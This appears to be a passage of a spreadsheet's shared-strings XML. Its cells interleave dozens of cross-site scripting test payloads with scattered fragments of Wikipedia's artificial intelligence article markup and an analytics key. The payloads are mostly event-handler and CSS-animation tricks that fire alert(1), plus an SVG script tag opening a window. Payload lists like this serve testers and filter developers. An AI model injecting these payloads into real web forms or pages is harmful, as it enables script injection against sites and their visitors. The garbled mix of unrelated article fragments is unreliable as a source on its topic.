    <t>&lt;ol onblur=alert(1) tabindex=1 id=x&gt;&lt;/ol&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;isindex type=image onload=alert(1) src=validimage.png&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;214–215 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT&gt;alert('')&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>The Mathematical Objection:</t>
  </si>
  <si>
    <t>&lt;strike onpointerout=alert(1)&gt;XSS&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFBuchanan2005" class="citation journal"&gt;Buchanan, Bruce G. (2005). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20070926023314/http://www.aaai.org/AITopics/assets/PDF/AIMag26-04-016.pdf"&gt;"A (Very) Brief History of Artificial Intelligence" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;textarea style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;object id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/object&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;frame onmouseup="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r886047268"/&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:X-ray_of_a_hand_with_automatic_bone_age_calculation.jpg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/5/5e/X-ray_of_a_hand_with_automatic_bone_age_calculation.jpg/220px-X-ray_of_a_hand_with_automatic_bone_age_calculation.jpg" decoding="async" width="220" height="308" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/5/5e/X-ray_of_a_hand_with_automatic_bone_age_calculation.jpg/330px-X-ray_of_a_hand_with_automatic_bone_age_calculation.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/5/5e/X-ray_of_a_hand_with_automatic_bone_age_calculation.jpg/440px-X-ray_of_a_hand_with_automatic_bone_age_calculation.jpg 2x" data-file-width="1303" data-file-height="1827" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;canvas id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-artsy-346"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-artsy_346-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ins onpointermove=alert(1)&gt;XSS&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;object onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/object&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-332"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-332"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;a onmouseleave="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-werbos1982-242"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-werbos1982_242-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;area ondragover=alert(1) contenteditable&gt;drop here&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;video autoplay controls onvolumechange=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;template id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/template&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dt onbeforecopy="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dt ondrop=alert(1) contenteditable&gt;drop here&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Social_computing" title="Social computing"&gt;Social computing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;element ondblclick="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onpointermove=alert(1)&gt;XSS&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			Print/export</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-sak2015-271"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-sak2015_271-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div onbeforecut="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;footer ondragover=alert(1) contenteditable&gt;drop here&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;big onbeforecut="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_geography" title="Philosophy of geography"&gt;Geography &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;small id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox authority-control" aria-labelledby="Authority_control_frameless_&amp;amp;#124;text-top_&amp;amp;#124;10px_&amp;amp;#124;alt=Edit_this_at_Wikidata_&amp;amp;#124;link=https&amp;amp;#58;//www.wikidata.org/wiki/Q11660&amp;amp;#124;Edit_this_at_Wikidata" style="padding:3px"&gt;&lt;table class="nowraplinks hlist navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th id="Authority_control_frameless_&amp;amp;#124;text-top_&amp;amp;#124;10px_&amp;amp;#124;alt=Edit_this_at_Wikidata_&amp;amp;#124;link=https&amp;amp;#58;//www.wikidata.org/wiki/Q11660&amp;amp;#124;Edit_this_at_Wikidata" scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Help:Authority_control" title="Help:Authority control"&gt;Authority control &lt;/a&gt; &lt;a href="https://www.wikidata.org/wiki/Q11660" title="Edit this at Wikidata"&gt;&lt;img alt="Edit this at Wikidata" src="//upload.wikimedia.org/wikipedia/en/thumb/8/8a/OOjs_UI_icon_edit-ltr-progressive.svg/10px-OOjs_UI_icon_edit-ltr-progressive.svg.png" decoding="async" width="10" height="10" style="vertical-align: text-top" srcset="//upload.wikimedia.org/wikipedia/en/thumb/8/8a/OOjs_UI_icon_edit-ltr-progressive.svg/15px-OOjs_UI_icon_edit-ltr-progressive.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/8/8a/OOjs_UI_icon_edit-ltr-progressive.svg/20px-OOjs_UI_icon_edit-ltr-progressive.svg.png 2x" data-file-width="20" data-file-height="20" /&gt; &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;title draggable="true" ondrag="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;dd&gt;&lt;a href="/en/1.7/"&gt;1.7&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;th onpaste="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;p onbeforecut="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;embed style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;figure onblur=alert(1) tabindex=1 id=x&gt;&lt;/figure&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;section onbeforecopy="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;select id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;27–32 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-414"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-414"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;isindex draggable="true" ondragenter="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;blink id=x tabindex=1 onactivate=alert(1)&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;mark onmouseup="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Uniformitarianism" title="Uniformitarianism"&gt;Uniformitarianism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Metz, Cade (15 March 2018). &lt;a rel="nofollow" class="external text" href="https://www.nytimes.com/2018/03/15/technology/military-artificial-intelligence.html"&gt;"Pentagon Wants Silicon Valley's Help on A.I." &lt;/a&gt; &lt;i&gt;The New York Times &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;19 March </t>
  </si>
  <si>
    <t>&lt;embed onmouseleave="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;col draggable="true" ondragleave="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>Neural networks and connectionism:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;ins style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;thead onclick="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;select onkeydown="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;th draggable="true" ondragleave="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;ruby draggable="true" ondragenter="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;details id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/details&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dir draggable="true" ondrag="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;select onbeforecopy="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=74" title="Edit section: History of AI"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;dd onpointerenter=alert(1)&gt;XSS&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;audio onloadeddata=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onkeyup="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;dt onkeypress="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;area draggable="true" ondragend="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onmouseout="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onbeforecopy="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;402–407, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;var oncut="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Digital_art" title="Digital art"&gt;Digital art &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;link onpaste="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;ul id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/ul&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Document_management_system" title="Document management system"&gt;Document management &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;acronym oncut="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;article onpointerenter=alert(1)&gt;XSS&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;rb onbeforecopy="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_perception" title="Philosophy of perception"&gt;Perception &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;source id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>analytics.load("8UDQfnf3cyFSTsM4YANnW5sXmgZVILbA");</t>
  </si>
  <si>
    <t>&lt;strike onpointermove=alert(1)&gt;XSS&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;frame oncopy="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;sup style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;sup id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Virtual_machine" title="Virtual machine"&gt;Virtual machine &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;img alt="Category" src="//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/16px-Folder_Hexagonal_Icon.svg.png" decoding="async" title="Category" width="16" height="14" srcset="//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/24px-Folder_Hexagonal_Icon.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/32px-Folder_Hexagonal_Icon.svg.png 2x" data-file-width="36" data-file-height="31" /&gt; &lt;a href="/wiki/Category:Existential_risk_from_artificial_general_intelligence" title="Category:Existential risk from artificial general intelligence"&gt;Category &lt;/a&gt; &lt;/dt&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;picture onpointerenter=alert(1)&gt;XSS&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft_id=https%3A%2F%2Fars.electronica.art%2Fcenter%2Fen%2Fexhibitions%2Fai%2F+Retrieved+September+2019&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;legend draggable="true" ondragleave="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;.&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dir id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/dir&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Idealism" title="Idealism"&gt;Idealism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;title oncopy="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Alphabet_of_human_thought" title="Alphabet of human thought"&gt;Alphabet of human thought &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Deep_learning" title="Deep learning"&gt;Deep learning &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;rtc id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/rtc&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open('https://www.google.com/')&gt;&lt;/script</t>
  </si>
  <si>
    <t>&lt;rb onpaste="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;tt style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;input onkeypress="alert(1)" contenteditable&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="#CITEREFKolata1982"&gt;Kolata 1982 &lt;/a&gt;, a paper in &lt;i&gt;&lt;a href="/wiki/Science_(journal)" title="Science (journal)"&gt;Science &lt;/a&gt; &lt;/i&gt;, which describes &lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;McCarthy's &lt;/a&gt; indifference to biological models. Kolata quotes McCarthy as writing: "This is AI, so we don't care if it's psychologically real"&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://books.google.com/books?id=PEkqAAAAMAAJ"&gt;"Science" &lt;/a&gt;. August 1982. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Science&amp;amp;rft.date=1982-08&amp;amp;rft_id=https%3A%2F%2Fbooks.google.com%2Fbooks%3Fid%3DPEkqAAAAMAAJ&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;video oncontextmenu="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;animate onpointerdown=alert(1)&gt;XSS&lt;/animate&gt;</t>
  </si>
  <si>
    <t>&lt;input onselect=alert(1) value="XSS" autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:D%C3%A9tection_de_personne_-_exemple_3.jpg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;A self-driving car system may use a neural network to determine which parts of the picture seem to match previous training images of pedestrians, and then model those areas as slow-moving but somewhat unpredictable rectangular prisms that must be avoided.&lt;sup id="cite_ref-79" class="reference"&gt;&lt;a href="#cite_note-79"&gt;&amp;#91;76&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-80" class="reference"&gt;&lt;a href="#cite_note-80"&gt;&amp;#91;77&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;shadow oncut="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;rb draggable="true" ondragend="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;rb oncopy="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onmouseleave="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;title onpointerover=alert(1)&gt;XSS&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;option draggable="true" ondragend="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;nextid oncut="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onbeforecopy="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;tr onkeydown="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;object oncontextmenu="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;IEEE Transactions on Autonomous Mental Development &lt;/i&gt;. &lt;b&gt;2 &lt;/b&gt; (1): 2–16. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2Ftamd.2009.2039057"&gt;10.1109/tamd.2009.2039057 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Transactions+on+Autonomous+Mental+Development&amp;amp;rft.atitle=On+the+impact+of+robotics+in+behavioral+and+cognitive+sciences%3A+from+insect+navigation+to+human+cognitive+development&amp;amp;rft.volume=2&amp;amp;rft.issue=1&amp;amp;rft.pages=2-16&amp;amp;rft.date=2010&amp;amp;rft_id=info%3Adoi%2F10.1109%2Ftamd.2009.2039057&amp;amp;rft.aulast=Oudeyer&amp;amp;rft.aufirst=P-Y.&amp;amp;rft_id=http%3A%2F%2Fwww.pyoudeyer.com%2FIEEETAMDOudeyer10.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;blockquote id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;blink id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onkeydown="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;span onkeyup="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote oncontextmenu="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_biology" title="Glossary of biology"&gt;Biology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frameset draggable="true" ondragenter="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;dd onpointerup=alert(1)&gt;XSS&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;ins onkeypress="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;option onmouseleave="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div&gt; &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;ul style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;picture onmousedown="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-22"&gt;&lt;a href="#Embodied_intelligence"&gt;&lt;span class="tocnumber"&gt;5.3.1 </t>
  </si>
  <si>
    <t>&lt;data onbeforecopy="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;details style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;header onpointerleave=alert(1)&gt;XSS&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;ins onbeforecut="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;picture onpaste="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:Automated_online_assistant.png" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;An &lt;a href="/wiki/Automated_online_assistant" class="mw-redirect" title="Automated online assistant"&gt;automated online assistant &lt;/a&gt; providing customer service on a web page – one of many very primitive applications of artificial intelligence &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;rb onpointerup=alert(1)&gt;XSS&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onclick="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-134"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-134"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;big onpointerout=alert(1)&gt;XSS&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;style draggable="true" ondragend="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;details id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=26" title="Edit section: Tools"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;object onpointerover=alert(1)&gt;XSS&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;header id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/header&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;meta style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;data onpointerover=alert(1)&gt;XSS&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;rb draggable="true" ondragstart="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;template onpointerdown=alert(1)&gt;XSS&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote id=x tabindex=1 onactivate=alert(1)&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;th ondragover=alert(1) contenteditable&gt;drop here&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;strike id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Matz, S. C., et al. "Psychological targeting as an effective approach to digital mass persuasion." Proceedings of the National Academy of Sciences (2017): 201710966. </t>
  </si>
  <si>
    <t>&lt;br onclick="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Adaptable_robotics" title="Adaptable robotics"&gt;Adaptable &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Nanorobotics" title="Nanorobotics"&gt;Nanorobotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" ondragend="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;i onpointerout=alert(1)&gt;XSS&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;animatemotion onpointerout=alert(1)&gt;XSS&lt;/animatemotion&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_geology" title="Glossary of geology"&gt;Geology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
